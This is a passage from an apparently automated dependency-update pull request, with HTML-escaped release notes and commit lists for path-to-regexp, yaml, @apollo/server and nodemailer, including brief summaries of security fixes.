\u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4926\"\u003eCVE-2026-4926\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-j3q9-mxjg-w52f\"\u003eGHSA-j3q9-mxjg-w52f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4923\"\u003eCVE-2026-4923\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-27v5-c462-wpq7\"\u003eGHSA-27v5-c462-wpq7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestricts wildcard backtracking when using more than 1 in a path (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/421\"\u003epillarjs/path-to-regexp#421\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDedupes regex prefixes (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/422\"\u003epillarjs/path-to-regexp#422\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis will result in shorter regular expressions for some cases using optional groups\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRejects large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/424\"\u003epillarjs/path-to-regexp#424\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eWhen using groups such as \u003ccode\u003e/users{/delete}\u003c/code\u003e it will restrict the number of generated combinations to \u0026lt; 256, equivalent to 8 top-level optional groups and unlikely to occur in a real world application, but avoids exploding the regex size for applications that accept user created routes\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.3.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd custom error class (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/398\"\u003e#398\u003c/a\u003e)  2a7f2a4\u003c/li\u003e\n\u003cli\u003eAllow plain objects for \u003ccode\u003eTokenData\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/391\"\u003e#391\u003c/a\u003e)  687a9bb\u003c/li\u003e\n\u003cli\u003eEscape text should escape backslash (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/390\"\u003e#390\u003c/a\u003e)  a4a8552\u003c/li\u003e\n\u003cli\u003eImproved error messages and stack size (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/363\"\u003e#363\u003c/a\u003e)  a6bdf40\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOther\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMinifying the parser\n\u003cul\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/401\"\u003e#401\u003c/a\u003e)  9df2448\u003c/li\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/395\"\u003e#395\u003c/a\u003e)  4a91505\u003c/li\u003e\n\u003cli\u003eShaving some bytes  d63f44b\u003c/li\u003e\n\u003cli\u003eRemove optional operator  973d15c\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/34cb451ddaeea4783a2fe60579ffb3e4ccfc73a7\"\u003e\u003ccode\u003e34cb451\u003c/code\u003e\u003c/a\u003e 8.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/22a967901afc8b2b42eefe456faa7b6773dcc415\"\u003e\u003ccode\u003e22a9679\u003c/code\u003e\u003c/a\u003e Reject large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/424\"\u003e#424\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/8881a88930cf96ebaa00412a8e87cdd601bb3f3d\"\u003e\u003ccode\u003e8881a88\u003c/code\u003e\u003c/a\u003e Byte optimization (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/423\"\u003e#423\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/43669ac637fe70fad33693d145a74d98179152ce\"\u003e\u003ccode\u003e43669ac\u003c/code\u003e\u003c/a\u003e Dedupe regex prefixes (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/422\"\u003e#422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/48646547da685c1ccb76a95fe23373975a91e200\"\u003e\u003ccode\u003e4864654\u003c/code\u003e\u003c/a\u003e Restrict repeated wildcard backtracking (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/421\"\u003e#421\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/05a5a973702a863fb69415294503d13cb9d18b20\"\u003e\u003ccode\u003e05a5a97\u003c/code\u003e\u003c/a\u003e Remove dependabot config (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/404\"\u003e#404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/5b635cd1bd1d6d7ed6023d8834ae6e6a1e22461f\"\u003e\u003ccode\u003e5b635cd\u003c/code\u003e\u003c/a\u003e Remove \u003ccode\u003epackage-lock.json\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/407\"\u003e#407\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c4f5b3fc10782a5de2bee55c3e40e5af890c9cad\"\u003e\u003ccode\u003ec4f5b3f\u003c/code\u003e\u003c/a\u003e 8.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/6587c812746cba94855867612f3a719bb25f794e\"\u003e\u003ccode\u003e6587c81\u003c/code\u003e\u003c/a\u003e Move parameter name errors up in docs (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/402\"\u003e#402\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/9df2448fdfca9d2957cf47a1777b5deda9be18cf\"\u003e\u003ccode\u003e9df2448\u003c/code\u003e\u003c/a\u003e Remove more bytes from parser (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/401\"\u003e#401\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yaml` from 1.10.2 to 1.10.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/cfe8f0437054ff5fbfe6499894f55b3316a54959\"\u003e\u003ccode\u003ecfe8f04\u003c/code\u003e\u003c/a\u003e 1.10.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/7abcf45dd63f0bc626890ad9a8cdeb397f92be73\"\u003e\u003ccode\u003e7abcf45\u003c/code\u003e\u003c/a\u003e fix: Catch stack overflow during CST composition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/a0252f8b056f49875d1b79edb8709cff7d7d0dc6\"\u003e\u003ccode\u003ea0252f8\u003c/code\u003e\u003c/a\u003e chore: Add rules avoiding processing of tests/json-test-suite\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/a5e83b05f7124c31b4784b613f0c669959a5ed48\"\u003e\u003ccode\u003ea5e83b0\u003c/code\u003e\u003c/a\u003e style: Apply updates Prettier rules\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/b8ddca0a5d4794a3c60f252d3513e6ff7068fdf0\"\u003e\u003ccode\u003eb8ddca0\u003c/code\u003e\u003c/a\u003e chore: Refresh lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/395f892ec9a26b9038c8db388b675c3281ab8cd3\"\u003e\u003ccode\u003e395f892\u003c/code\u003e\u003c/a\u003e ci: Use a different (working) submodule checkout\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/6fd272052751775e48196024d4bed639cc1e0350\"\u003e\u003ccode\u003e6fd2720\u003c/code\u003e\u003c/a\u003e test-events: Add {} and [] indicators to flow maps \u0026amp; sequences\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/eemeli/yaml/compare/v1.10.2...v1.10.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@apollo/server` from 4.13.0 to 5.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apollographql/apollo-server/releases\"\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server-integration-testsuite\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8191\"\u003e#8191\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eApollo Server now rejects GraphQL \u003ccode\u003eGET\u003c/code\u003e requests which contain a \u003ccode\u003eContent-Type\u003c/code\u003e header other than \u003ccode\u003eapplication/json\u003c/code\u003e (with optional parameters such as \u003ccode\u003e; charset=utf-8\u003c/code\u003e). Any other value is now rejected with a 415 status code.\u003c/p\u003e\n\u003cp\u003e(GraphQL \u003ccode\u003eGET\u003c/code\u003e requests without a \u003ccode\u003eContent-Type\u003c/code\u003e header are still allowed, though they do still need to contain a non-empty \u003ccode\u003eX-Apollo-Operation-Name\u003c/code\u003e or \u003ccode\u003eApollo-Require-Preflight\u003c/code\u003e header to be processed if the default CSRF prevention feature is enabled.)\u003c/p\u003e\n\u003cp\u003eThis improvement makes Apollo Server's CSRF more resistant to browsers which implement CORS in non-spec-compliant ways. Apollo is aware of one browser which as of March 2026 has a bug which allows an attacker to circumvent Apollo Server's CSRF prevention feature to carry out read-only XS-Search-style CSRF attacks. The browser vendor is in the process of patching this vulnerability; upgrading Apollo Server to v5.5.0 mitigates this vulnerability.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf your server uses cookies (or HTTP Basic Auth) for authentication, Apollo encourages you to upgrade to v5.5.0.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThis is technically a backwards-incompatible change. Apollo is not aware of any GraphQL clients which provide non-empty \u003ccode\u003eContent-Type\u003c/code\u003e headers with \u003ccode\u003eGET\u003c/code\u003e requests with types other than \u003ccode\u003eapplication/json\u003c/code\u003e. If your use case requires such requests, please \u003ca href=\"https://github.com/apollographql/apollo-server/issues\"\u003efile an issue\u003c/a\u003e and we may add more configurability in a follow-up release.\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/apollographql/apollo-server/security/advisories/GHSA-9q82-xgwf-vj6h\"\u003eadvisory GHSA-9q82-xgwf-vj6h\u003c/a\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.5.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8191\"\u003e#8191\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/glasser\"\u003e\u003ccode\u003e@​glasser\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eApollo Server now rejects GraphQL \u003ccode\u003eGET\u003c/code\u003e requests which contain a \u003ccode\u003eContent-Type\u003c/code\u003e header other than \u003ccode\u003eapplication/json\u003c/code\u003e (with optional parameters such as \u003ccode\u003e; charset=utf-8\u003c/code\u003e). Any other value is now rejected with a 415 status code.\u003c/p\u003e\n\u003cp\u003e(GraphQL \u003ccode\u003eGET\u003c/code\u003e requests without a \u003ccode\u003eContent-Type\u003c/code\u003e header are still allowed, though they do still need to contain a non-empty \u003ccode\u003eX-Apollo-Operation-Name\u003c/code\u003e or \u003ccode\u003eApollo-Require-Preflight\u003c/code\u003e header to be processed if the default CSRF prevention feature is enabled.)\u003c/p\u003e\n\u003cp\u003eThis improvement makes Apollo Server's CSRF more resistant to browsers which implement CORS in non-spec-compliant ways. Apollo is aware of one browser which as of March 2026 has a bug which allows an attacker to circumvent Apollo Server's CSRF prevention feature to carry out read-only XS-Search-style CSRF attacks. The browser vendor is in the process of patching this vulnerability; upgrading Apollo Server to v5.5.0 mitigates this vulnerability.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf your server uses cookies (or HTTP Basic Auth) for authentication, Apollo encourages you to upgrade to v5.5.0.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThis is technically a backwards-incompatible change. Apollo is not aware of any GraphQL clients which provide non-empty \u003ccode\u003eContent-Type\u003c/code\u003e headers with \u003ccode\u003eGET\u003c/code\u003e requests with types other than \u003ccode\u003eapplication/json\u003c/code\u003e. If your use case requires such requests, please \u003ca href=\"https://github.com/apollographql/apollo-server/issues\"\u003efile an issue\u003c/a\u003e and we may add more configurability in a follow-up release.\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/apollographql/apollo-server/security/advisories/GHSA-9q82-xgwf-vj6h\"\u003eadvisory GHSA-9q82-xgwf-vj6h\u003c/a\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server-integration-testsuite\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.4.0\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.4.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.4.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/phryneas\"\u003e\u003ccode\u003e@​phryneas\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apollographql/apollo-server/blob/main/packages/server/CHANGELOG.md\"\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8191\"\u003e#8191\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/glasser\"\u003e\u003ccode\u003e@​glasser\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eApollo Server now rejects GraphQL \u003ccode\u003eGET\u003c/code\u003e requests which contain a \u003ccode\u003eContent-Type\u003c/code\u003e header other than \u003ccode\u003eapplication/json\u003c/code\u003e (with optional parameters such as \u003ccode\u003e; charset=utf-8\u003c/code\u003e). Any other value is now rejected with a 415 status code.\u003c/p\u003e\n\u003cp\u003e(GraphQL \u003ccode\u003eGET\u003c/code\u003e requests without a \u003ccode\u003eContent-Type\u003c/code\u003e header are still allowed, though they do still need to contain a non-empty \u003ccode\u003eX-Apollo-Operation-Name\u003c/code\u003e or \u003ccode\u003eApollo-Require-Preflight\u003c/code\u003e header to be processed if the default CSRF prevention feature is enabled.)\u003c/p\u003e\n\u003cp\u003eThis improvement makes Apollo Server's CSRF more resistant to browsers which implement CORS in non-spec-compliant ways. Apollo is aware of one browser which as of March 2026 has a bug which allows an attacker to circumvent Apollo Server's CSRF prevention feature to carry out read-only XS-Search-style CSRF attacks. The browser vendor is in the process of patching this vulnerability; upgrading Apollo Server to v5.5.0 mitigates this vulnerability.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf your server uses cookies (or HTTP Basic Auth) for authentication, Apollo encourages you to upgrade to v5.5.0.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThis is technically a backwards-incompatible change. Apollo is not aware of any GraphQL clients which provide non-empty \u003ccode\u003eContent-Type\u003c/code\u003e headers with \u003ccode\u003eGET\u003c/code\u003e requests with types other than \u003ccode\u003eapplication/json\u003c/code\u003e. If your use case requires such requests, please \u003ca href=\"https://github.com/apollographql/apollo-server/issues\"\u003efile an issue\u003c/a\u003e and we may add more configurability in a follow-up release.\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/apollographql/apollo-server/security/advisories/GHSA-9q82-xgwf-vj6h\"\u003eadvisory GHSA-9q82-xgwf-vj6h\u003c/a\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.4.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/phryneas\"\u003e\u003ccode\u003e@​phryneas\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eThe default configuration of \u003ccode\u003estartStandaloneServer\u003c/code\u003e was vulnerable to denial of service (DoS) attacks through specially crafted request bodies with exotic character set encodings.\u003c/p\u003e\n\u003cp\u003eIn accordance with \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc7159#section-8.1\"\u003eRFC 7159\u003c/a\u003e, we now only accept request bodies encoded in UTF-8, UTF-16 (LE or BE), or UTF-32 (LE or BE).\nAny other character set will be rejected with a \u003ccode\u003e415 Unsupported Media Type\u003c/code\u003e error.\nNote that the more recent JSON RFC, \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc8259#section-8.1\"\u003eRFC 8259\u003c/a\u003e, is more strict and will only allow UTF-8.\nSince this is a minor release, we have chosen to remain compatible with the more permissive RFC 7159 for now.\nIn a future major release, we may tighten this restriction further to only allow UTF-8.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf you were not using \u003ccode\u003estartStandaloneServer\u003c/code\u003e, you were not affected by this vulnerability.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eGenerally, please note that we provide \u003ccode\u003estartStandaloneServer\u003c/code\u003e as a convenience tool for quickly getting started with Apollo Server.\nFor production deployments, we recommend using Apollo Server with a more fully-featured web server framework such as Express, Koa, or Fastify, where you have more control over security-related configuration options.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.3.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8062\"\u003e#8062\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/8e54e5827791666e36082ad49d19c77f050355ac\"\u003e\u003ccode\u003e8e54e58\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/cristunaranjo\"\u003e\u003ccode\u003e@​cristunaranjo\u003c/code\u003e\u003c/a\u003e! - Allow configuration of graphql execution options (maxCoercionErrors)\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003econst server = new ApolloServer({\n  typeDefs,\n  resolvers,\n  executionOptions: {\n    maxCoercionErrors: 50,\n  },\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/64c0e1bb5d79d571bf448c35aea0b31097e6ce9d\"\u003e\u003ccode\u003e64c0e1b\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8192\"\u003e#8192\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e Reject GET requests with a Content-Type other than application/json (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8191\"\u003e#8191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/ad45d1505d867de4c2761b7935855445ef7641e7\"\u003e\u003ccode\u003ead45d15\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8179\"\u003e#8179\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/443e54747d44c1d7c213d019936514dec024b450\"\u003e\u003ccode\u003e443e547\u003c/code\u003e\u003c/a\u003e fix repository urls\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/28d6d47ff636751807141267c329acb736c177b6\"\u003e\u003ccode\u003e28d6d47\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8172\"\u003e#8172\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/26320bccd77c6074d4a38119294f153f64e52d96\"\u003e\u003ccode\u003e26320bc\u003c/code\u003e\u003c/a\u003e feat: Allow configuration of graphql validation options \u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8014\"\u003e#8014\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/f2c16a7caff895a8b97c5a800405795cb19ba624\"\u003e\u003ccode\u003ef2c16a7\u003c/code\u003e\u003c/a\u003e bump dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/8e54e5827791666e36082ad49d19c77f050355ac\"\u003e\u003ccode\u003e8e54e58\u003c/code\u003e\u003c/a\u003e feat: Allow configuration of graphql execution options(maxCoercionErrors)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/7be3686ae62fb04bb4d0bfddb465d5e89631d4e4\"\u003e\u003ccode\u003e7be3686\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8163\"\u003e#8163\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apollographql/apollo-server/commits/@apollo/server@5.5.0/packages/server\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​apollo/server\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nodemailer` from 8.0.1 to 8.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/releases\"\u003enodemailer's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca 